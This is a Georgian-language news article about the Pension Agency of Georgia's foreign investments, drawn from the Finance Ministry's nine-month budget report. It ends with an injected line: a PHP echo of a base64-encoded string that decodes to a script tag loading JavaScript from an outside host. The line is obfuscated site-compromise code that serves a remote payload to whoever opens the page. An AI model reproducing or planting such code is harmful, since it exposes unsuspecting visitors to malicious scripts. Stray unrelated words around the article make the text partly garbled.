celsiusi
ავერსი საქკაბელი
საქართველოს საპენსიო სააგენტოს 86 მილიონი დოლარი უცხოურ კორპორაციულ აქციებში განთავსებული - ამის შესახებ ბიუჯეტის შესრულების 9 თვის ანგარიშიდან ირკვევა, რომელიც ფინანსთა სამინისტრომ გამოაქვეყნა.
 
ამავე სტატისტიკის მიხედვით, 174 მილიონი დოლარი უცხოურ სამთავრობო ობლიგაციებში არის განთავსებული.
 
“2022 წლის 30 ივნისისთვის საპენსიო აქტივების ღირებულებამ (დეკლარირებული + სარგებელი) 2.66 მლრდ ლარი შეადგინა.
 
საინვესტიციო საბჭოს გადაწყვეტილებით, საპენსიო აქტივებზე რეალური ამონაგების გაზრდის მიზნით და მონაწილეთა ინტერესების შესაბამისად, სააგენტომ განახორციელა 435.0 მლნ ლარის ოდენობის ინვესტიცია მაღალრეიტინგული ადგილობრივი ლიცენზირებული კომერციული ბანკების მიერ გამოშვებულ სადეპოზიტო სერტიფიკატებში, ხოლო 10.0 მლნ ლარის ოდენობის საპენსიო აქტივები ეროვნულ ვალუტაში განთასდა ბანკების ვადიან დეპოზიტებზე.
 
სააგენტომ განახორციელა 4.5 მლნ ლარის ოდენობის ინვესტიცია საქართველოს სახაზინო ვალდებულებებში, ხოლო 317.1 მლნ ლარის ოდენობის ინვესტიცია საქართველოს სახაზინო ობლიგაციებში. საანგარიშო პერიოდის განმავლობაში, შეძენილ იქნა 178.0 მლნ აშშ დოლარი, რომლის ინვესტირებაც განხორციელდა უცხოურ ვალუტაში დენომინირებულ სხვადასხვა აქტივებში. სააგენტომ 254.4 მლნ აშშ დოლარი განათავსა უცხოურ სამთავრობო ფასიან ქაღალდებში (აქედან, 173.7 მლნ აშშ დოლარის რეინვესტირება მოახდინა), 86.4 მლნ აშშ დოლარი უცხოურ კორპორაციულ აქციებში (კონკრეტულად iShares MSCI World ETF-ში), ხოლო 8.4 მლნ აშშ დოლარი საქართველოს სუვერენულ ევროობლიგაციებში,”- ნათქვამია ბიუჯეტის შესრულების ანგარიშში.
 
ამჟამად, საპენსიო სისტემაში 1,322,000 ადამიანი არის ჩართული, საიდანაც 1,034,000 ადამიანი კერძო სექტორიდანაა, ხოლო 288,000 ადამიანი საჯარო სექტორიდან. თავად კერძო კომპანიების რიცხვი, რომელთა თანამშრომლებიც სისტემაში არიან გაწევრიანებული - 90.6 ათასს შეადგენს.
444
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");